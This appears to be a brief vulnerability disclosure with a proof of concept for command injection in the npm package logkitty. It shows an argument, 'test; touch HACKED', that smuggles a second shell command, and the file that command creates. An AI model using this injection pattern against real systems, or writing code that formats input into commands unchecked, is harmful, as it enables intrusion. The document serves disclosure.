The issue occurs because user input is formatted into a command that is then executed without any check.
HACKED
npm i logkitty # Install affected module
logkitty android app 'test; touch HACKED' # Note that the touch command is inside the single quotes, so it is passed as part of one argument, yet it is executed anyway
HACKED has been created